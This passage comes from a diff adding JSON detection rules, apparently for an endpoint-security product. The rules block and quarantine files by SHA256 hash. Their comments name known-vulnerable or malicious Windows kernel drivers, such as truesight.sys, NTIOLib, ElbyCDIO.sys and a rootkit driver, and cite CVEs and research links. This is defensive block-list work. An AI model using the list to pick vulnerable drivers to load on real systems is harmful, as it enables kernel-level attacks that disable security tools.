+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f427d5dd-6230-518e-8519-c13d2f7694f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614421Z",
+ "creation_date": "2026-03-23T11:45:29.614423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f43d360d-0b3b-57c8-bf5b-a3c99e42cc74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488725Z",
+ "creation_date": "2026-03-23T11:45:31.488727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "562c8ce6ac6adcce9ae1ff1031ceb230acb2e6db7d4af9ea680ede81ceb993dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f43fd366-8964-5767-982e-78384fb87108",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820217Z",
+ "creation_date": "2026-03-23T11:45:31.820220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aaec14ba263d8950a271f31b4720aa83daba86d0f8d5e8bce4148fe55982599",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f45e8d63-fc62-5ecf-a13e-643b0ddee0b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971731Z",
+ "creation_date": "2026-03-23T11:45:29.971733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4645f32-4986-540d-a2c1-5837d0bae5a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148179Z",
+ "creation_date": "2026-03-23T11:45:31.148181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148189Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5456e3d16caf28e4ad56e7c047084d89fbe8c312a4d28abb2ae1a6a1ffd4d8e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f474bf69-81e8-5f7f-a95e-4fd8df201661",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822102Z",
+ "creation_date": "2026-03-23T11:45:30.822106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "694385b46b72e65604afd251fba3c8febb42225343d38feecec3f424ce45f2c3",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f476fc73-6cee-5943-b34a-529baa2637b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973130Z",
+ "creation_date": "2026-03-23T11:45:29.973132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45b7ec74cc78651975d01d88308f3231df4c96036d6c2273d79f53abdfc8888c",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f48ce149-c36c-51e4-98e7-702e74ad7861",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817408Z",
+ "creation_date": "2026-03-23T11:45:31.817410Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817416Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cef3bd693dc86b5962d66e3cdade498143a4d921fdc5d8f823732d02082cae8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f48ec029-8443-580a-81d4-d70d50fb9bb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817557Z",
+ "creation_date": "2026-03-23T11:45:30.817559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817564Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bf3985644308662ebfa2fbcc11fb4d3e2a0c817ad3da1a791020f8c8589ebc8",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f48f86bd-2651-5bd3-a0fe-73096c1c7220",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816691Z",
+ "creation_date": "2026-03-23T11:45:30.816693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816700Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13ae4d9dcacba8133d8189e59d9352272e15629e6bca580c32aff9810bd96e44",
+ "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f493a728-d01e-5af5-a363-17b5365e619f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477083Z",
+ "creation_date": "2026-03-23T11:45:30.477087Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9ad7199c00d477ebbc15f2dcf78a6ba60c2670dad0ef0994cebccb19111f890",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f49f5a34-37b6-52f6-8abe-db95642d8fa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619490Z",
+ "creation_date": "2026-03-23T11:45:29.619492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4b57b4c-b90b-5bde-86d4-5ed488cc65ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824294Z",
+ "creation_date": "2026-03-23T11:45:30.824296Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d320bae0560a5c14f2b4998930a582a3db9131105c51be8780f3e42eb9c830d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4c7a4f7-1b43-5f8f-9012-284fda08822a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458779Z",
+ "creation_date": "2026-03-23T11:45:30.458782Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0174cea1dd70b374f355126ae6be650dff95897d8c8200caac91d4f9e5e5b871",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4cb2b6b-efa6-5a95-879d-2183c359003f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620833Z",
+ "creation_date": "2026-03-23T11:45:29.620835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4cbc1c4-729b-5359-a5be-96d316da0087",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821699Z",
+ "creation_date": "2026-03-23T11:45:30.821702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "348dc502ac57d7362c7f222e656c52e630c90bef92217a3bd20e49193b5a69f1",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4de6c0a-c86a-546b-9ed0-595abeb61343",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825405Z",
+ "creation_date": "2026-03-23T11:45:31.825407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd6e242ea118af2d1a089ee4013e0b18e62de477d610e47b4aaa551bc708cca4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4e600c5-1431-529c-b5c4-72d5b039ece6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494656Z",
+ "creation_date": "2026-03-23T11:45:31.494658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e397c79b7e6ccd146aaca3aed2289677f546176f107dc8d529e6761e58b20bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4eb7494-4c1f-5aa0-93d4-90d1e2422916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968022Z",
+ "creation_date": "2026-03-23T11:45:29.968024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7da5e6b6212c03d4d862795d05aace1a06db4943489cb639b9ca9a88563c9d0f",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4ef332a-7e97-515a-8669-4fc2e214fb22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811081Z",
+ "creation_date": "2026-03-23T11:45:31.811083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "481dc99c83a17b4afeb99597f8aa8c7b61756b3b848c3624741869410d5c9266",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4f71a07-890a-5891-8f59-021885c9402c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479238Z",
+ "creation_date": "2026-03-23T11:45:31.479242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffb536b3fba7aecb5be8b9211a6899e4b3f4cf592d7a8aa0ce7e72f6c95b0f76",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4f86dc3-3077-5974-81b8-0b95e1367f06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154960Z",
+ "creation_date": "2026-03-23T11:45:31.154962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d44a12e97d1c9280e460b7172a436f5a72ccd65d9b36b99abf523c1a1f7a3034",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f50dae47-3ead-523b-b8ff-b1cc6af7410c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
